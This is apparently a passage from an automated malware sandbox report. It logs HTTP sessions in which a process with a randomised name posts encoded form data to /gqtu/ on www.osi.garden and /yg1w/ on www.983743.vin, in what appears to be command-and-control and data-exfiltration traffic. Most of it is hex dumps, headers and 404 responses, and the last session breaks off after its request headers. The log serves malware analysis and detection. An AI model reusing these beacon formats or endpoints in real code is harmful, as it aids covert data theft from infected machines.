                                                                                                              Nov 5, 2024 15:35:41.092140913 CET57INData Raw: d0 35 da 27 2e 7b 76 9b 73 e3 90 f7 f1 f5 88 5c 7b ed 11 79 5e a8 1e 2f df c3 fd f8 ed bf 01 00 00 ff ff 0d 0a 41 0d 0a 03 00 84 b2 e2 6d 6d 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 5'.{vs\{y^/Amm'0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              26192.168.11.204976768.65.122.222804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:43.622961998 CET737OUTPOST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 53 34 2b 42 32 4b 56 42 2f 45 2b 4c 4a 6e 56 4b 5a 44 71 35 4c 66 6e 68 30 66 66 44 6e 63 46 44 34 6a 4f 4b 6e 4a 69 67 74 45 31 59 6b 44 47 77 30 31 42 65 54 47 70 2f 44 4f 63 42 74 41 44 53 68 4f 65 31 36 32 56 32 72 7a 75 63 76 2b 5a 7a 35 76 76 4c 49 64 46 61 52 48 76 34 38 46 4c 78 77 4b 46 79 38 4f 65 48 61 30 45 6c 54 7a 39 35 30 37 44 70 54 48 74 49 6e 49 35 51 46 43 35 4e 75 4a 6b 31 79 7a 44 2b 58 6d 54 35 47 48 65 59 43 67 73 51 4a 55 54 36 48 75 5a 72 72 52 54 39 38 6d 31 54 6c 78 43 35 64 50 45 41 72 6e 4b 37 4d 4d 70 6e 72 76 6b 35 78 6b 39 6a 72 71 71 75 5a 6c 52 2f 77 4d 76 41 79 35 32 4a 47 6a 46 61 71 32 30 55 38 53 51 3d
                                                                                                              Data Ascii: Q2_4=S4+B2KVB/E+LJnVKZDq5Lfnh0ffDncFD4jOKnJigtE1YkDGw01BeTGp/DOcBtADShOe162V2rzucv+Zz5vvLIdFaRHv48FLxwKFy8OeHa0ElTz9507DpTHtInI5QFC5NuJk1yzD+XmT5GHeYCgsQJUT6HuZrrRT98m1TlxC5dPEArnK7MMpnrvk5xk9jrqquZlR/wMvAy52JGjFaq20U8SQ=
                                                                                                              Nov 5, 2024 15:35:43.803977966 CET1289INHTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:35:43 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close
                                                                                                              Data Raw: 31 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 12 78 db 93 00 42 80 24 10 20 81 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef 26 4b 7e 6d 6b 02 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b fa ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 09 52 e7 7f 32 43 e8 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 6a 5e 43 d3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2d 23 27 f9 06 49 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f [TRUNCATED]
                                                                                                              Data Ascii: 1339Zrz_OAJw1xB$ RU85d)d{,T.7w~&K~mkiAco)(}Y}_poOw5kdNY{K0+,wR2Cz@We}5:|@r<aBQ$JBj^CGU}J4\nU1z{'/CyVN%-#'I iA7re*:#=12p(N45Hy?jqP:y~+8EYND)~:o5(oEU8hnN},}r:\>[#MwC=TEU>FWjzU;uSn&_.Sqz_JM~(7_E/SyXI>3UNe7A\q`IWhWZJ|jV70?#GC*E[*3v8uMWxkp5gjq9_yW^?wkQ{9BdFo^uufl(Oj^UeY>PU#_)?M&F,?*{O;Ido77yq,U}:*eLv9Q7MZ~AN]NSZUlA9W$|-?]>'z:FF7/|7?v/8]VR>t&$F/)"Keh<7ln< q [TRUNCATED]
                                                                                                              Nov 5, 2024 15:35:43.804078102 CET1289INData Raw: 0f 50 18 79 1e c8 3e 8e b8 5a 9f 2e 91 fd 9c d7 ef c7 bd 99 73 c0 bc 15 ed d3 55 64 18 f8 33 2b 3e 56 f9 1b c4 4b 25 fd 64 53 34 a0 bc 84 2f 73 bb 2f b8 81 f8 f3 59 7e 05 fa 3e d3 07 c2 d0 ae a3 f6 63 c6 fd 79 be 0f 7e 54 56 f5 bd 1b 46 89 f7 99
                                                                                                              Data Ascii: Py>Z.sUd3+>VK%dS4/s/Y~>cy~TVF/0{]s HnzB}Y/@_y,0k"1Rlc#Wy$fj!fu{U%f>L1-0f*gP?)>_<v.e)o{#[dqKCb
                                                                                                              Nov 5, 2024 15:35:43.804094076 CET1289INData Raw: 50 02 2f ea 62 11 8c d6 d9 e1 9c 6e b8 bd 39 ae 85 3e 0e ad 8e 18 9d ce 84 c4 a7 e8 51 68 85 1d c3 8f db 89 bd 03 1b 56 0f b3 79 ac 9b 22 12 8d d5 49 c6 2f 90 b0 db b7 b3 72 94 46 da 5c 5a 3b 4b 81 22 fb 82 13 cb 84 36 e4 ed 7c 8b ed 63 02 66 31
                                                                                                              Data Ascii: P/bn9>QhVy"I/rF\Z;K"6|cf1QIB4S*-t"P=:$Y=]eL/H8hXcn7L0qNPXZ;Jn9`q,%neaWP.]>g_l7&wZAC/Hk-EPm-
                                                                                                              Nov 5, 2024 15:35:43.804109097 CET1289INData Raw: 57 61 6c 80 b9 47 b4 a3 71 a6 31 ae 3a 99 49 6d 3e 81 e1 de 6b 8b bc dd ce f9 82 5a f9 b9 d8 4b d5 01 3d 4d 61 b9 93 cc a6 1a 57 a9 15 d2 b2 64 89 72 37 ab 17 a7 71 a3 8e 34 80 74 6c 56 72 fd 32 63 9d 93 bc 5a 6c 62 9d ee 72 6e 7e 32 60 d8 33 d7
                                                                                                              Data Ascii: WalGq1:Im>kZK=MaWdr7q4tlVr2cZlbrn~2`3U#]Ea/k}4FeN}N@YNJmLVSVt\nDOg>wNd9-zfx65D"rWg`"HEfSEd,h[X{/6C]s:{&nmLxlZN8d^d0Zl
                                                                                                              Nov 5, 2024 15:35:43.804120064 CET57INData Raw: d0 35 da 27 2e 7b 76 9b 73 e3 90 f7 f1 f5 88 5c 7b ed 11 79 5e a8 1e 2f df c3 fd f8 ed bf 01 00 00 ff ff 0d 0a 41 0d 0a 03 00 6d 3a a6 76 6d 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 5'.{vs\{y^/Am:vm'0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              27192.168.11.204976868.65.122.222804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:46.339553118 CET1289OUTPOST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 53 34 2b 42 32 4b 56 42 2f 45 2b 4c 4a 6e 56 4b 5a 44 71 35 4c 66 6e 68 30 66 66 44 6e 63 46 44 34 6a 4f 4b 6e 4a 69 67 74 48 56 59 6b 57 4b 77 33 53 56 65 51 47 70 2f 64 65 63 41 74 41 44 4c 68 4f 48 38 36 32 52 4d 72 31 71 63 74 63 68 7a 2f 64 58 4c 42 64 46 61 66 58 76 35 34 46 4b 72 77 4b 31 2b 38 4f 4f 48 61 30 45 6c 54 78 31 35 6a 35 37 70 56 48 74 4c 67 49 35 63 42 43 35 6c 75 4a 39 4e 79 7a 48 78 58 57 7a 35 47 6a 36 59 4f 79 30 51 46 55 54 34 45 75 59 30 72 52 65 6a 38 6d 35 70 6c 78 65 41 64 4d 6b 41 72 44 79 6d 49 4d 6c 74 78 38 59 55 37 6c 42 67 72 5a 47 36 53 58 6f 42 2f 73 4c 50 31 39 69 38 46 68 5a 69 31 47 41 7a 74 6d 51 53 6b 70 66 75 36 57 50 4c 34 69 4e 69 77 4c 30 36 79 77 66 4c 74 59 54 78 62 7a 68 50 4b 4a 46 6a 58 39 47 61 2b 51 54 33 47 77 4b 57 68 2b 78 4b 74 4c 67 57 71 2b 4d 51 74 72 41 6a 73 7a 49 57 50 74 30 6b 74 39 56 6b 53 74 72 6b 63 6f 70 45 61 69 42 72 4c 56 68 55 69 79 69 76 4b 48 79 38 6c 71 6c 70 45 31 73 7a 6d 58 52 67 56 58 61 76 76 72 48 44 4f [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=S4+B2KVB/E+LJnVKZDq5Lfnh0ffDncFD4jOKnJigtHVYkWKw3SVeQGp/decAtADLhOH862RMr1qctchz/dXLBdFafXv54FKrwK1+8OOHa0ElTx15j57pVHtLgI5cBC5luJ9NyzHxXWz5Gj6YOy0QFUT4EuY0rRej8m5plxeAdMkArDymIMltx8YU7lBgrZG6SXoB/sLP19i8FhZi1GAztmQSkpfu6WPL4iNiwL06ywfLtYTxbzhPKJFjX9Ga+QT3GwKWh+xKtLgWq+MQtrAjszIWPt0kt9VkStrkcopEaiBrLVhUiyivKHy8lqlpE1szmXRgVXavvrHDO+h6WuzXrjW7kRU4UksV659WPcc+t6zx2Qq9niQ+sIJb7JXBSWM9z/y2V6N1yunnO2Um3nDC/mmT8gkx4DhlvnsEmV/VhV+S+u1FYGHAwZDF960IUZrjoFRqGtrhKtPu3d0GV1TfJQ6xr1Cogopwd4mZFNix0oDB5ZKaaQXgfEJ81GDW1AkUNRl0J0lIm91a3S1nbbkca+BL+4AZMBkHgUWBHO6gQG2ZzKVc/ZbHZ8d+8OoVOxYrQUHj/aBXJWhRGEwO/H0rivj3EHZUhePB9zbo1zWwSQ8wfRaCtM+WGMaXGnFEXhncXhk8Y7dpktsHBAAU2rYN20JJQSeesSTKQX0K46T3N9OTt4vLyfArdvwOsqstrdSCIQDKBwE9wDQ91/PMS+RZoboT4QPg/vgXpEw+scer/M6FVF77tn7FxKr/OZ3HWwM
                                                                                                              Nov 5, 2024 15:35:46.339608908 CET6597OUTData Raw: 73 31 67 63 30 65 58 79 57 67 69 51 52 53 6d 73 79 6a 31 50 51 47 52 55 45 59 58 4d 4b 33 50 77 47 4a 67 43 73 59 7a 69 6b 4e 2f 67 30 73 67 72 41 56 4c 41 78 54 79 53 42 59 51 31 76 61 6e 2f 43 6b 36 61 75 53 48 4b 6a 57 52 54 71 56 7a 45 50 78
                                                                                                              Data Ascii: s1gc0eXyWgiQRSmsyj1PQGRUEYXMK3PwGJgCsYzikN/g0sgrAVLAxTySBYQ1van/Ck6auSHKjWRTqVzEPx6dYaS9r/7jylOJCAoFQvULkN6GVcoLKv8WmfMSQvyWmgn0c9etI+4+p1NqEPQioG1meMod9iq0KHgmhnKFjTo+sbSivYf66tnDrfZeUefMbJLCNFZA/9HUf5Y3d8uRyTmzUlJ2oYuMF3dnN7tLcXDCadDo5ahD2K9
                                                                                                              Nov 5, 2024 15:35:46.535250902 CET1289INHTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:35:46 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close
                                                                                                              Data Raw: 31 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 12 78 db 93 00 42 80 24 10 20 81 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef 26 4b 7e 6d 6b 02 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b fa ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 09 52 e7 7f 32 43 e8 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 6a 5e 43 d3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2d 23 27 f9 06 49 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f [TRUNCATED]
                                                                                                              Data Ascii: 1339Zrz_OAJw1xB$ RU85d)d{,T.7w~&K~mkiAco)(}Y}_poOw5kdNY{K0+,wR2Cz@We}5:|@r<aBQ$JBj^CGU}J4\nU1z{'/CyVN%-#'I iA7re*:#=12p(N45Hy?jqP:y~+8EYND)~:o5(oEU8hnN},}r:\>[#MwC=TEU>FWjzU;uSn&_.Sqz_JM~(7_E/SyXI>3UNe7A\q`IWhWZJ|jV70?#GC*E[*3v8uMWxkp5gjq9_yW^?wkQ{9BdFo^uufl(Oj^UeY>PU#_)?M&F,?*{O;Ido77yq,U}:*eLv9Q7MZ~AN]NSZUlA9W$|-?]>'z:FF7/|7?v/8]VR>t&$F/)"Keh<7ln< q [TRUNCATED]
                                                                                                              Nov 5, 2024 15:35:46.535319090 CET1289INData Raw: 0f 50 18 79 1e c8 3e 8e b8 5a 9f 2e 91 fd 9c d7 ef c7 bd 99 73 c0 bc 15 ed d3 55 64 18 f8 33 2b 3e 56 f9 1b c4 4b 25 fd 64 53 34 a0 bc 84 2f 73 bb 2f b8 81 f8 f3 59 7e 05 fa 3e d3 07 c2 d0 ae a3 f6 63 c6 fd 79 be 0f 7e 54 56 f5 bd 1b 46 89 f7 99
                                                                                                              Data Ascii: Py>Z.sUd3+>VK%dS4/s/Y~>cy~TVF/0{]s HnzB}Y/@_y,0k"1Rlc#Wy$fj!fu{U%f>L1-0f*gP?)>_<v.e)o{#[dqKCb
                                                                                                              Nov 5, 2024 15:35:46.535367012 CET1289INData Raw: 50 02 2f ea 62 11 8c d6 d9 e1 9c 6e b8 bd 39 ae 85 3e 0e ad 8e 18 9d ce 84 c4 a7 e8 51 68 85 1d c3 8f db 89 bd 03 1b 56 0f b3 79 ac 9b 22 12 8d d5 49 c6 2f 90 b0 db b7 b3 72 94 46 da 5c 5a 3b 4b 81 22 fb 82 13 cb 84 36 e4 ed 7c 8b ed 63 02 66 31
                                                                                                              Data Ascii: P/bn9>QhVy"I/rF\Z;K"6|cf1QIB4S*-t"P=:$Y=]eL/H8hXcn7L0qNPXZ;Jn9`q,%neaWP.]>g_l7&wZAC/Hk-EPm-
                                                                                                              Nov 5, 2024 15:35:46.535413027 CET1289INData Raw: 57 61 6c 80 b9 47 b4 a3 71 a6 31 ae 3a 99 49 6d 3e 81 e1 de 6b 8b bc dd ce f9 82 5a f9 b9 d8 4b d5 01 3d 4d 61 b9 93 cc a6 1a 57 a9 15 d2 b2 64 89 72 37 ab 17 a7 71 a3 8e 34 80 74 6c 56 72 fd 32 63 9d 93 bc 5a 6c 62 9d ee 72 6e 7e 32 60 d8 33 d7
                                                                                                              Data Ascii: WalGq1:Im>kZK=MaWdr7q4tlVr2cZlbrn~2`3U#]Ea/k}4FeN}N@YNJmLVSVt\nDOg>wNd9-zfx65D"rWg`"HEfSEd,h[X{/6C]s:{&nmLxlZN8d^d0Zl
                                                                                                              Nov 5, 2024 15:35:46.535443068 CET57INData Raw: a0 6b b4 4f 5c f6 ec 36 e7 c6 21 ef e3 eb 11 b9 f6 da 23 f2 bc 50 3d 5e be 87 fb f1 db 7f 03 00 00 ff ff 0d 0a 41 0d 0a 03 00 eb ec 35 a0 6d 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: kO\6!#P=^A5m'0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              28192.168.11.204976968.65.122.222804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:49.057204008 CET454OUTGET /gqtu/?uXP=1HX8&Q2_4=f6Wh19Zbj3f0KGUwZR2TDfnh8ZC1kt4m9SH2+p3LnlYuxzS1qi5wc2xrbNMUplnXpMrttmRXmQTtzIwx74OUI7QZZXrSykXx07R8xuG/LilMEmUkiLjEEHk= HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.osi.garden
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:35:49.237687111 CET1289INHTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              date: Tue, 05 Nov 2024 14:35:49 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close
                                                                                                              Data Raw: 32 37 36 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                                              Data Ascii: 276D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                                              Nov 5, 2024 15:35:49.237756968 CET1289INData Raw: 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74
                                                                                                              Data Ascii: 0%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A;
                                                                                                              Nov 5, 2024 15:35:49.237807035 CET1289INData Raw: 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30
                                                                                                              Data Ascii: text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0;
                                                                                                              Nov 5, 2024 15:35:49.237852097 CET1289INData Raw: 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: : 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; }
                                                                                                              Nov 5, 2024 15:35:49.237894058 CET1289INData Raw: 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f
                                                                                                              Data Ascii: fRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4
                                                                                                              Nov 5, 2024 15:35:49.237937927 CET1289INData Raw: 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e 74 45 55 4b 58 47 43 39 35 6a 4b 2b 52 67 34 51 42 56 77 4e 6d 6c 65 50 5a 56 6a 54 78 75 6f 32 34 6b 57 4d 72 51 48 67 2f
                                                                                                              Data Ascii: 7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQ
                                                                                                              Nov 5, 2024 15:35:49.237979889 CET1289INData Raw: 61 70 69 34 34 72 46 70 66 71 54 5a 41 6e 57 2b 4a 46 52 47 33 6b 66 39 34 5a 2b 73 53 71 64 52 31 55 49 69 49 2f 64 63 2f 42 36 4e 2f 4d 39 57 73 69 41 44 4f 30 30 41 33 51 55 30 68 6f 68 58 35 52 54 64 65 43 72 73 74 79 54 31 57 70 68 55 52 54
                                                                                                              Data Ascii: api44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr27
                                                                                                              Nov 5, 2024 15:35:49.238028049 CET1289INData Raw: 64 6f 63 75 6d 65 6e 74 2e 73 68 74 6d 6c 20 70 6f 72 74 20 38 30 20 6f 6e 20 54 75 65 73 64 61 79 2c 20 30 35 2d 4e 6f 76 2d 32 30 32 34 20 30 39 3a 33 35 3a 34 39 20 45 53 54 22 3e 20 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 20 20 20 20 20
                                                                                                              Data Ascii: document.shtml port 80 on Tuesday, 05-Nov-2024 09:35:49 EST"> WebMaster</a>. </section> <p class="reason-text">The server cannot find the requested page:</p> </div> <section class="additional-info">
                                                                                                              Nov 5, 2024 15:35:49.238061905 CET11INData Raw: 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: ml>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              29192.168.11.204977045.150.55.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:55.488802910 CET717OUTPOST /yg1w/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.983743.vin
                                                                                                              Origin: http://www.983743.vin
                                                                                                              Referer: http://www.983743.vin/yg1w/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
